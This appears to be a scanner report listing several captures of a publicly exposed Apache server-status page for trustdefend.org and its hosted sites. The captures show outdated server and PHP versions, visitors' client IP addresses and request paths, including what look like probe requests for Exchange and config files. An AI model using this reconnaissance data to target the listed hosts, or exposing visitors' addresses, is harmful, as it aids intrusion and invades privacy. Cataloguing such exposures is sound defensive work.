      Total accesses: 38512533 - Total Traffic: 2396.9 GB
      CPU Usage: u49.14 s15.92 cu0 cs0 - .00626% CPU load
      37.1 requests/sec - 2.4 MB/second - 65.3 kB/request
      10 requests currently being processed, 5 idle workers
      __WWC__W_GWWG...G..G............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-560139070/35/1514791_
      0.07000.00.9098496.25
      2604:a880:400:d0::20ad:1trustdefend.org:8080GET / HTTP/1.0
      
      1-560139390/24/1500914_
      0.0504810.01.4795576.89
      213.180.203.49ustami-mladenca.ru:8080GET /catalog/detskie-krovatki/bebi-bum/vedruss/agat/alisa/mibb/
      
      2-560140270/20/1476165W
      0.05000.01.1494729.60
      136.243.228.180francy.ru:8080GET /product/guerlain-idylle-duet-jasmin-lilas/ HTTP/1.0
      
      3-560138990/9/1449062W
      0.02700.00.2892309.90
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-560140621/15/1425126C
      0.0318083482.23.9491584.30
      123.13.61.124sleep70.ru:8080GET /detyam/plavki-dlya-devochek-detail HTTP/1.0
      
      5-560141120/18/1388900_
      0.05010.01.4990038.58
      188.162.166.105peregorodkirus.ru:8080GET /catalog/view/theme/revolution/stylesheet/fonts/Ubuntu-R.wo
      
      6-560142710/9/1387776_
      0.01010.00.6189086.03
      188.162.166.105peregorodkirus.ru:8080GET /catalog/view/theme/revolution/stylesheet/fonts/fontawesome
      
      7-560139010/9/1362487W
      0.02000.00.7888086.02
      46.101.103.192trustdefend.org:8080GET /server-status HTTP/1.0
      
      8-560141550/22/1322275_
      0.04000.00.3884280.44
      2604:a880:800:10::d58:6001trustdefend.org:8080GET / HTTP/1.0
      
      9-559122310/17/1288404G
      0.052900.04.6981964.34
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-560139030/25/1264117W
      0.07000.01.2581960.45
      95.142.198.138musicinfonews.site:8080GET /feed/ HTTP/1.0
      
      11-560139050/38/1218144W
      0.09000.02.4078343.57
      95.161.221.77yipman.ru:8080GET /xronologiya-zhizni-ip-mana/ HTTP/1.0
      
      12-559116340/55/1207650G
      0.153000.02.4377164.98
      185.240.102.28over-shop.ru:8080GET /index.php?route=extension/module/syncms/OrderAdd&cron= HTT
      
      13-559-0/0/1176833.
      0.061110200.00.0075833.55
      66.249.66.163ehto.ru:8080GET /montazh-elektriki/provodka-v-monolitnyh-domah-osobennosti-
      
      14-559-0/0/1134914.
      0.07113610.00.0073360.79
      95.108.213.88smetano1.ru:8080GET /?yclid=7710547526903176844 HTTP/1.0
      
      15-558-0/0/1085195.
      0.02263600490.00.0069460.88
      85.192.11.242ecomrussia.ru:8080GET /novosti/2020/mezhdunarodnyij-plas-forum-%c2%abretail-centr
      
      16-559118300/54/1025982G
      0.141800.01.9367057.06
      5.253.61.250xn--44-jlcmylbp.xn--p1ai:8080POST /wp-admin/admin-ajax.php?action=rocket_partial_preload&non
      
      17-559-0/0/1004159.
      0.06118890.00.0065033.06
      213.180.203.212krovlyafasady.ru:8080GET /vodostochnye-sistemy/metallicheskii-vodostok/vodostoki-ska
      
      18-559-0/0/948703.
      0.061154620.00.0060724.65
      95.108.213.98plastikovaya-tara.ru:8080GET /evrokontejner-s-dvumya-ruchkami-ed-64-17-2gl/ HTTP/1.0
      
      19-559131170/4/879600G
      0.002800.00.0856171.46
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      20-558-0/0/831482.
      1.108800.00.0053306.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-558-0/0/776095.
      0.0236500.00.0050358.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-558-0/0/729010.
      0.0037900.00.0047111.28
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-558-0/0/680008.
      0.0137100.00.0043883.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-558-0/0/635880.
      0.0336700.00.0040639.05
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-558-0/0/577586.
      0.7320100.00.0036663.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-558-0/0/550409.
      0.0137400.00.0034668.07
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-558-0/0/525603.
      0.8717800.00.0034444.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-558-0/0/493305.
      0.3935100.00.0030972.52
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-558-0/0/448474.
      0.2129700.00.0028563.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-558-0/0/418011.
      0.0037800.00.0025881.37
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-558-0/0/384850.
      0.2436600.00.0024116.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-558-0/0/368275.
      0.0535000.0
      Found on 2023-10-17 00:40
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42d8a61f21

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Saturday, 23-Sep-2023 04:43:14 MSK
      Restart Time: Friday, 15-Sep-2023 09:53:36 MSK
      Parent Server Config. Generation: 270
      Parent Server MPM Generation: 269
      Server uptime:  7 days 18 hours 49 minutes 37 seconds
      Server load: 8.27 9.20 9.90
      Total accesses: 25755663 - Total Traffic: 1562.4 GB
      CPU Usage: u62.75 s19.3 cu0 cs0 - .0122% CPU load
      38.3 requests/sec - 2.4 MB/second - 63.6 kB/request
      16 requests currently being processed, 5 idle workers
      __WWWWW_WWWWWW_WWW.._......W....W...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-269231250/129/1009846_
      0.200300.05.5864021.35
      107.115.203.108jenny.linkpc.net:8080GET / HTTP/1.0
      
      1-269187370/363/991805_
      0.68050.015.9762867.04
      45.76.155.163hard.line.pm:8080GET /go.php?link=1 HTTP/1.0
      
      2-269255790/68/985467W
      0.12200.03.0461624.95
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      3-269234180/207/979193W
      0.44200.011.5462242.22
      185.240.102.28autosoren.ru:8080GET /category/novosti/dtp/page/24/ HTTP/1.0
      
      4-269283680/25/952570W
      0.03100.00.8560044.83
      139.171.170.210sleep70.ru:8080GET /zhenshchinam/top-krylyshki-1-detail HTTP/1.0
      
      5-269221080/222/948301W
      0.381800.015.8259422.91
      185.240.102.28autosoren.ru:8080POST /wp-admin/admin-ajax.php?action=rocket_partial_preload&non
      
      6-269265460/29/929291W
      0.042000.01.1259034.97
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      7-269212900/357/918894_
      0.620580.017.4957857.73
      57.128.165.174jenny.linkpc.net:8080GET / HTTP/1.0
      
      8-269285800/5/899145W
      0.01000.00.0056948.92
      64.124.8.53mapsshop.ru:8080GET /vektornaja_karta_sela_macha-rodniki_mif/data/pictures_tpl/
      
      9-269234910/158/868764W
      0.29000.010.0453859.05
      64.124.8.76mapsshop.ru:8080GET /vektornaja_karta_derevni_rodnikovaia_adobe-illustrator.htm
      
      10-269285060/10/854815W
      0.01000.00.2754093.87
      64.124.8.53mapsshop.ru:8080GET /vektornaja_karta_sela_kaka_mif/data/pictures_tpl/GPS_karta
      
      11-269193890/327/838298W
      0.59000.023.9252660.46
      64.124.8.53mapsshop.ru:8080GET /vektornaja_karta_sela_nizhniaia_kaiancha.html HTTP/1.0
      
      12-269271160/55/824633W
      0.09400.02.8752697.86
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      13-269168110/491/791410W
      0.86000.034.5250182.66
      185.240.102.28autosoren.ru:8080GET /category/novosti/dtp/page/81/ HTTP/1.0
      
      14-269277270/44/776120_
      0.070590.02.3149065.61
      189.39.177.251next.run.place:8080GET / HTTP/1.0
      
      15-269250090/208/736490W
      0.34000.010.8846456.52
      198.199.121.22trustdefend.org:8080GET /server-status HTTP/1.0
      
      16-269256660/86/731393W
      0.142100.04.1345401.98
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      17-269285830/6/705714W
      0.00000.00.2643980.29
      64.124.8.53mapsshop.ru:8080GET /vektornaja_karta_hutora_veselyj_650462_mif/data/pictures_t
      
      18-269-0/0/654834.
      0.2011400.00.0041613.17
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-269-0/0/612878.
      0.3612600.00.0038383.39
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-269157350/330/583007_
      0.6202210.019.2036127.47
      213.180.203.147mebozon.ru:8080GET /ofisnye-divany/divan-ofisnyj-biznes-162h78-salatovyj HTTP/
      
      21-269-0/0/554453.
      0.0615700.00.0034144.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-269-0/0/516650.
      0.0715500.00.0031346.12
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-269-0/0/477288.
      0.0316400.00.0029022.54
      146.190.64.200topseller.su:8080GET /config.json HTTP/1.0
      
      24-269-0/0/443714.
      0.0116800.00.0026549.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-269-0/0/403021.
      0.3087940.00.0024748.11
      5.255.231.3mirmoda24.ru:8080GET /catalog/bluza-miloslava-chateau-fleur_649347/ HTTP/1.0
      
      26-269-0/0/375421.
      0.5014500.00.0023130.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-269169730/388/345587W
      0.68000.021.1821282.18
      64.124.8.53mapsshop.ru:8080GET /vektornaja_karta_sela_mihajlo-pavlovsk_mif/data/pictures_t
      
      28-269-0/0/325290.
      1.8213200.00.0019598.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-269-0/0/309307.
      0.0016900.00.0018636.28
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-269-0/0/291853.
      0.0413800.00.0017415.89
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-269-0/0/275281.
      0.353700.00.0016218.54
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-269169780/407/248770W
      0.673200.0<
      Found on 2023-09-23 01:43
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb4228f8896c

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Tuesday, 19-Sep-2023 06:36:36 MSK
      Restart Time: Friday, 15-Sep-2023 09:53:36 MSK
      Parent Server Config. Generation: 150
      Parent Server MPM Generation: 149
      Server uptime:  3 days 20 hours 42 minutes 59 seconds
      Server load: 9.08 8.82 8.90
      Total accesses: 12614789 - Total Traffic: 673.6 GB
      CPU Usage: u33.62 s8.43 cu0 cs0 - .0126% CPU load
      37.8 requests/sec - 2.1 MB/second - 56.0 kB/request
      17 requests currently being processed, 1 idle workers
      WWWW_W...WWWCWWW.W.WW.W..W......................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-149225360/151/446166W
      0.23000.05.5924449.38
      178.176.74.178ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      1-14931640/483/436402W
      0.791000.041.9124309.21
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      2-149202240/93/437210W
      0.14000.04.3923736.67
      5.181.170.43gotoadm.ru:8080GET /feed/ HTTP/1.0
      
      3-149201850/77/439310W
      0.11000.03.2524658.95
      159.65.58.104trustdefend.org:8080GET /server-status HTTP/1.0
      
      4-149252110/40/424713_
      0.06000.01.8223389.70
      178.163.42.216next.run.place:8080GET /images/title-bg-right.png HTTP/1.0
      
      5-14990850/453/421969W
      0.80000.068.2222938.13
      178.176.74.178ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      6-149-0/0/414626.
      0.282500.00.0023146.13
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-149-0/0/409092.
      0.102000.00.0022853.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-149-0/0/402616.
      0.301900.00.0022530.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      9-149230050/74/381613W
      0.102000.02.0020276.06
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-149230060/75/381691W
      0.10000.03.0421241.16
      178.176.74.178ehto.ru:8080POST / HTTP/1.0
      
      11-149237860/15/373742W
      0.03000.03.6720580.28
      185.173.37.75kalitkatomsk.ru:8080GET /mezhkomnatnye-dveri/107-krona/172-laura-dg-chernyj-triplek
      
      12-149239920/64/375990_
      0.140960.03.2920860.03
      213.180.203.26vidook.ru:8080GET /%D0%A0%D0%B5%D1%81%D1%82%D0%B0%D0%B2%D1%80%D0%B0%D1%86%D0%
      
      13-149163020/250/362631W
      0.44000.0105.4119936.50
      178.176.74.178ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      14-14910720/836/359081W
      1.30000.0159.2919650.05
      178.176.74.178ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      15-149239930/54/334587W
      0.08900.02.4218117.70
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      16-149-0/0/337231.
      0.042100.00.0018686.89
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-149240500/75/326385W
      0.10000.02.7818094.33
      178.176.74.178ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      18-149-0/0/312221.
      0.141000.00.0017305.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-149166570/289/299232W
      0.47000.0106.3016850.85
      178.176.74.178ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      20-149240510/79/283816W
      0.13300.02.1015509.78
      185.240.102.28yasno-krasno.ru:8080POST /wp-admin/admin-ajax.php?action=as_async_request_queue_run
      
      21-149-0/0/273019.
      0.061500.00.0014908.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-149166600/277/261541W
      0.45000.087.1313963.46
      178.176.74.178ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      23-149-0/0/239556.
      0.038400.00.0012742.31
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-149-0/0/227370.
      0.009000.00.0011996.82
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-149209270/198/209161W
      0.291000.08.6311247.08
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      26-149-0/0/199652.
      0.018200.00.0010920.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-149-0/0/186375.
      0.3026100.00.0010160.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-149-0/0/180610.
      0.0136700.00.009697.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-149-0/0/164532.
      0.0136900.00.008871.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-149-0/0/164397.
      0.628500.00.008660.07
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-149-0/0/157861.
      0.0534500.00.008347.39
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-149-0/0/144115.
      0.0435000.00.007682.19
      127.0.0.1185.240.102.32:8080OPT
      Found on 2023-09-19 03:36
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42476f3b47

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Saturday, 16-Sep-2023 21:27:51 MSK
      Restart Time: Friday, 15-Sep-2023 09:53:36 MSK
      Parent Server Config. Generation: 46
      Parent Server MPM Generation: 45
      Server uptime:  1 day 11 hours 34 minutes 14 seconds
      Server load: 9.05 10.48 13.81
      Total accesses: 4925790 - Total Traffic: 252.6 GB
      CPU Usage: u20.91 s4.89 cu0 cs0 - .0201% CPU load
      38.5 requests/sec - 2.0 MB/second - 53.8 kB/request
      15 requests currently being processed, 4 idle workers
      W.WW._WWW_W.WWW_.W.._W.W..WW....................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-45110800/28/146902W
      0.03000.00.957682.44
      5.255.231.73mebozon.ru:8080GET /ecomeb/divan-pryamoj-richmond-lyuks-1 HTTP/1.0
      
      1-45-0/0/143537.
      0.08300.00.007518.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      2-45293740/735/148858W
      1.112200.054.797760.60
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      3-4514280/59/150014W
      0.0716200.01.738006.51
      91.205.168.200ecomrussia.ru:8080GET /novosti/2020/mezhdunarodnyij-plas-forum-%C2%ABretail-centr
      
      4-45-0/0/140638.
      0.21200.00.007222.59
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      5-4588570/123/142023_
      0.19000.04.937580.39
      161.35.27.144trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      6-4573630/144/133142W
      0.24200.030.577408.83
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      7-45111480/12/131505W
      0.02000.00.617029.61
      161.35.27.144trustdefend.org:8080GET /server-status HTTP/1.0
      
      8-457000/39/136268W
      0.0418300.01.577219.80
      91.205.168.200ecomrussia.ru:8080GET /novosti/2020/mezhdunarodnyij-plas-forum-%C2%ABretail-centr
      
      9-45111490/22/125062_
      0.02000.08.696281.20
      178.62.3.65185.240.102.32:8080GET / HTTP/1.0
      
      10-45100230/74/126628W
      0.10000.03.516819.52
      5.255.231.70mebozon.ru:8080GET /divan-vestern-plyush-mokko HTTP/1.0
      
      11-45-0/0/127777.
      0.011600.00.006522.45
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-45235360/666/131213W
      1.033500.030.226677.44
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      13-45105700/58/122840W
      0.08000.02.576520.05
      5.255.231.76mebozon.ru:8080GET /ecomeb/divan-skandi-belfast-kantri-lajt HTTP/1.0
      
      14-45106050/43/124579W
      0.06000.01.996518.71
      5.255.231.83mebozon.ru:8080GET /rossiya/divan-uglovoj-prinston-micro-velvet-black-evroknig
      
      15-45106060/46/118140_
      0.08020.016.865981.01
      95.108.213.129pmznn.ru:8080GET / HTTP/1.0
      
      16-45-0/0/120069.
      0.011100.00.006358.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-45239900/731/121198W
      1.131600.036.286457.44
      188.162.145.101mintim.ru:8080POST /webasyst/shop/?plugin=cml1c&action=run HTTP/1.0
      
      18-45-0/0/113416.
      0.001700.00.006222.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-45-0/0/117956.
      0.40000.00.006284.29
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-4515330/243/109187_
      0.3704760.024.325836.86
      95.24.148.112cscg.ru:8080GET /webasyst/?action=count&background_process=1&idle=true&_=16
      
      21-45106720/27/105932W
      0.06000.01.445591.42
      5.255.231.72mebozon.ru:8080GET /ecomeb/divan-gunnar-forest-neraskladnoj?page=56 HTTP/1.0
      
      22-45-0/0/104209.
      0.001300.00.005484.82
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-4542510/316/98690W
      0.56000.012.375054.92
      65.108.249.107hard.line.pm:8080GET / HTTP/1.0
      
      24-45-0/0/94935.
      0.471200.00.005069.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-45-0/0/85793.
      0.066200.00.004685.37
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-4577720/123/83096W
      0.21000.04.584481.01
      188.162.145.101mintim.ru:8080POST /webasyst/shop/?plugin=cml1c&action=run HTTP/1.0
      
      27-4577730/185/84475W
      0.31000.06.224525.94
      176.193.36.87rewasd.ru:8080GET / HTTP/1.0
      
      28-45-0/0/82105.
      0.135000.00.004272.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-45-0/0/79715.
      0.3738100.00.004031.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-45-0/0/74472.
      0.0296000.00.003838.51
      24.7.176.41hard.line.pm:8080GET /ax/ HTTP/1.0
      
      31-45-0/0/69457.
      0.6178200.00.003381.61
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-45-0/0/67881.
      0.4575100.00.003675.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-45-0/0/71949.
      0
      Found on 2023-09-16 18:27
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb428ca9d95d

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 14-Sep-2023 01:30:18 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 1113
      Parent Server MPM Generation: 1112
      Server uptime:  26 days 13 hours 20 minutes 24 seconds
      Server load: 10.53 8.91 8.76
      Total accesses: 81867213 - Total Traffic: 4182.6 GB
      CPU Usage: u58.21 s14.74 cu0 cs0 - .00318% CPU load
      35.7 requests/sec - 1.9 MB/second - 53.6 kB/request
      29 requests currently being processed, 0 idle workers
      WWWWWWWWWWWWWWWWWWWWWWWWWWWWW...................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
